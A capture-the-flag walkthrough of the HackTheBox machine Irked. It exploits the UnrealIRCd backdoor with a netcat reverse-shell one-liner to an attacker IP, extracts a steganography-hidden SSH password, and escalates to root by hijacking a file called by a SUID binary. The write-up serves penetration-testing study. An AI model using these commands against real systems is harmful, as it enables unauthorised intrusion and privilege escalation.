HackTheBox - Irked

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSQ5A1ApLN5nwHsDQJJKfpFnMW13YY1gT3Ev6YSeGx2_BI1fjzbQnaYzM1E1GoSG_MmMTc&usqp=CAU


OS Difficulty IP Address Status
Linux Easy 10.10.10.117 Retired

This was classified as an easy machine by MrAgent on HackTheBox that is running a webpage containing an image and also running an Internet Relay Chat (IRC) application that contains a remote code execution vulnerability which we will analyze and exploit to gain a foothold on the box. For the privilege escalation part, we will find a setuid binary, since the SUID bit is set for root; we will abuse this binary and get root.

Phase 1 - Enumeration

Nmap

As usual, we start off with an nmap to identify open ports.

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36095/tcp6  status
|   100024  1          40049/udp6  status
|   100024  1          44079/udp   status
|_  100024  1          53133/tcp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Not much to enumerate at, so let’s run a full port scan, too.

PORT      STATE SERVICE	VERSION
22/tcp    open  ssh			OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http		Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind		rpcbind 2-4 (RPC #100000)
6697/tcp  open  ircs-u		UnrealIRCd
8067/tcp  open  infi-async	UnrealIRCd
65534/tcp open  irc			UnrealIRCd

We see a Internet Relay Chat port on 6697 which application name as UnrealIRCd.

Port 80

When we go to the webpage, we only find an image:
enter image description here

Nothing but a note stating “IRC is almost working” in the source code.
enter image description here

Phase 2 - Exploitation

UnrealIRC (RCE)

Nmap identified the IRC application as UnrealIRC, looking through ExploitDB’s command line tool searchsploit, we find an exploit for UnrealIRC 3.2.8.1:

┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ searchsploit UnrealIRC

UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)   | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow        | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute                 | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                      | windows/dos/27407.pl

Since we are doing things manually, we will skip the Metasploit version of the exploit and just look at the source code to understand how it is exploited.

def exploit
    connect

    print_status("Connected to #{rhost}:#{rport}...")
    banner = sock.get_once(-1, 30)
    banner.to_s.split("\n").each do |line|
    print_line("    #{line}")
    end

    print_status("Sending backdoor command...")
    sock.put("AB;" + payload.encoded + "\n")

    handler
    disconnect
end

It looks like the exploit is to connect to UnrealIRC and then send “AB;” with payload after.

Shell

We will connect to the IRC application through netcat and send our reverse shell.

┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ nc 10.10.10.117 6697
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 443 >/tmp/f
:irked.htb 451 AB; :You have not registered

And we get a shell as ircd:

┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ nc -lnvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.117.
Ncat: Connection from 10.10.10.117:40718.
bash: cannot set terminal process group (634): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

From ircd to djmardov

We can find user.txt, but I can’t read it:

ircd@irked:/home/djmardov/Documents$ cat user.txt 
cat: user.txt: Permission denied

In that same directory, there’s a hidden .backup file:

ircd@irked:/home/djmardov/Documents$ ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

The note along with the password is hinting at steganography.

Steganography

Steganography is the practice of hiding a secret message in something that hiding in plain sight, like an image. When we opened the webpage on port 80, there wasn’t anything but an image. Let’s download that image, and extract it using the password found:

┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ wget 10.10.10.117/irked.jpg
--2019-04-04 08:56:51--  http://10.10.10.117/irked.jpg
Connecting to 10.10.10.117:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34697 (34K) [image/jpeg]
Saving to: ‘irked.jpg’

irked.jpg                   100%[========================================>]  33.88K   137KB/s    in 0.2s

2019-04-04 08:56:52 (137 KB/s) - ‘irked.jpg’ saved [34697/34697]


┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss                                                                                                                 
wrote extracted data to "pass.txt".

┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ cat pass.txt   
Kab6h+m+bbp2J:HG

And we got the backup password of another user, let’s try to SSH into the machine:

┌──(kali㉿kali)-[~/CTF/HTB/machines/irked]
└─$ ssh [email protected]
[email protected]'s password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr  4 07:11:52 2019 from 10.10.14.7
djmardov@irked:~$

And we get in as djmardov and we can read the user flag.

Phase 3 - Privilege Escalation

SUID Path

When we run a find command to look for setuid binaries, we find one that sticks out:

djmardov@irked:~$ find / -perm /4000 2>/dev/null

...[snip]...
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser

Running the binary we get a path to a file that is ‘not found’

djmardov@irked:/dev/shm$ viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-04-03 06:34 (:0)
djmardov pts/2        2019-04-04 09:01 (10.10.14.14)
sh: 1: /tmp/listusers: not found

So let’s create the file which the viewuser binary is looking for and add a shell.

djmardov@irked:~$ echo sh > /tmp/listusers 
djmardov@irked:~$ chmod +x /tmp/listusers 
djmardov@irked:~$ viewuser 
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2018-11-20 11:57 (:0)
djmardov pts/0        2018-11-20 11:58 (10.10.14.7)
djmardov pts/1        2018-11-20 12:36 (10.10.14.7)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)

And we are root!